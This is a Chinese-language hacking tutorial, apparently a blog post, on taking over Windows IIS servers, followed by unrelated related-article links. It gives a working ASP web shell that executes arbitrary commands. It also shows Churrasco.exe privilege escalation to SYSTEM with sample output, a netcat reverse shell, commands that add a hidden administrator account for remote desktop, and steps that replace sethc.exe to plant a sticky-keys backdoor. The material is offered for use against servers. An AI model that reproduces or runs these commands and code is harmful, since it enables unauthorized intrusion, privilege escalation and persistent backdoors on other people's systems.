提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if %>

<form method="post">

<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>

<input type=text name="cmd" size=60><br>

<input type=submit value="net user"></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request("cmdx")="C:\RECYCLER\cmd.exe" then

response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall

end if

response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWORK SERVICE

/churrasco/-->Getting Rpcss PID ...

/churrasco/-->Found Rpcss PID: 696

/churrasco/-->Searching for Rpcss threads ...

/churrasco/-->Found Thread: 444

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 700

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 704

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 712

/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/-->Getting SYSTEM token from Rpcss Service...

/churrasco/-->Found szywjs Token

/churrasco/-->Found SYSTEM token 0xf1c

/churrasco/-->Running command with SYSTEM Token...

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe "net localgroup
administrators iisuser /add"
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe
c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\explorer.exe d:\windows\system32\sethc.exe"
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

SHIFT后门拿服务器之方法总结的更多相关文章

  1. linux下维护服务器之常用命令

    linux下维护服务器之常用命令! 第1套如下: 正则表达式: 1.如何不要文件中的空白行和注释语句: [root@localhost ~]# grep -v '^$' 文件名 |grep -v '^ ...

  2. backup服务器之rsync服务

    backup服务器之rsync服务   rsync是开源的.快速的.多功能的可实现全量及增量的本地或远程数据同步备份的优秀工具.它拥有scp.cp的全量复制功能,同时比scp.cp命令更优秀.更强大. ...

  3. 实现jquery.ajax及原生的XMLHttpRequest跨域调用WCF服务的方法

    关于ajax跨域调用WCF服务的方法很多,经过我反复的代码测试,认为如下方法是最为简便的,当然也不能说别人的方法是错误的,下面就来上代码,WCF服务定义还是延用上次的,如: namespace Wcf ...

  4. 实现jquery.ajax及原生的XMLHttpRequest调用WCF服务的方法

    废话不多说,直接讲解实现步骤 一.首先我们需定义支持WEB HTTP方法调用的WCF服务契约及实现服务契约类(重点关注各attribute),代码如下: //IAddService.cs namesp ...

  5. Web服务器之iis,apache,tomcat三者之间的比较

    IIS-Apache-Tomcat的区别 IIS与Tomcat的区别 IIS是微软公司的Web服务器.主要支持ASP语言环境. Tomcat是Java Servlet 2.2和JavaServer P ...

  6. WebService服务调用方法介绍

    1 背景概述 由于在项目中需要多次调用webservice服务,本文主要总结了一下java调用WebService常见的6种方式,即:四种框架的五种调用方法以及使用AEAI ESB进行调用的方法. 2 ...

  7. linux服务器之LVS、Nginx和HAProxy负载均衡器对比

    linux服务器之LVS.Nginx和HAProxy负载均衡器对比. LVS特点:  1.抗负载能力强,使用IP负载均衡技术,只做分发,所以LVS本身并没有多少流量产生:  2.稳定性.可靠性好,自身 ...

  8. Windows Server 2003开机自动启动MySQL服务设置方法

    Windows Server 2003开机自动启动MySQL服务设置方法 发布时间:2014-12-19 更新时间:2014-12-24 来源:网络 作者:eaglezhong 关键词: 2003 e ...

  9. 【转】Android 服务器之SFTP服务器上传下载功能

    原文网址:http://blog.csdn.net/tanghua0809/article/details/47056327 本文主要是讲解Android服务器之SFTP服务器的上传下载功能,也是对之 ...

随机推荐

  1. 【USACO 1.2】Name That Number

    给你一串数字(≤12个),每个数字可以对应3个字母,求生成的所有字符串里,在字典内的有哪些. 我做的时候想的是字典树(Trie 树),模拟数串生成的所有字符串,然后在字典树里查找一下. /* TASK ...

  2. ORA-29538、ORA-29532、ORA-29913问题解决

    问题一:ERROR at line 1: ORA-29538: Java not installed解决方法1.检查有没有安装JAVA组件select * from v$option t where ...

  3. eclipse中xml文件不能自动提示的解决办法

    1.出现不能提示的情况

  4. SQLServer日期格式化

    0   或   100   (*)     默认值   mon   dd   yyyy   hh:miAM(或   PM)       1   101   美国   mm/dd/yyyy       ...

  5. Linux.BackDoor.Chikdos/Elknot Attack And Defense Analysis

    catalogue . 恶意程序概述 . 模块分解 . 通信协议 . 木马清理 1. 恶意程序概述 Trojan.Chikdos.A是一个木马,它允许远程攻击者利用受感染计算机发动DDoS攻击 . 木 ...

  6. bash的配置

    Bash的启动文件 启动文件也是一种脚本,不过它是在Bash在启动之初就执行它的.不同的启动方式使用的启动文件也有不同. 1. 作为交互的登录脚本环境“交互的”是指你可以再这个环境下输入命令.而所谓的 ...

  7. 使用convert来批量处理图片

    这是个神奇的工具,居然使用命令行就可以这么方便的处理图片.功能有待挖掘. 这个是把图片批量进行 resize 的脚本. #!/bin/sh counter= root=mypict resolutio ...

  8. Ansible简介

    概述 Ansible是一种自动化运维管理工具,无需安装客户端,通过SSH协议与节点通信. 架构 由上图可以看出Ansible由5个部分组成 Ansible:核心 Inventory:定义管理主机的清单 ...

  9. StringBuilder类与String类的区别

    String对象是不可改变的,每次使用String类中的方法时,都要在内存中创建一个新的字符串对象,这就需要为该新对象分配新的空间.在需要对字符串执行重复修改的情况下,与创建新的String对象相关的 ...

  10. 【问题】R文件报错原因及解决办法 (转)

    错误如图.下面是几种解决方法(网上搜集的). 1.如果是导入项目出现这个问题,一般是R文件没有更新造成(据说导入项目,R不会自动更新).可以Project——clean以下,R文件会重新生成. 2.选 ...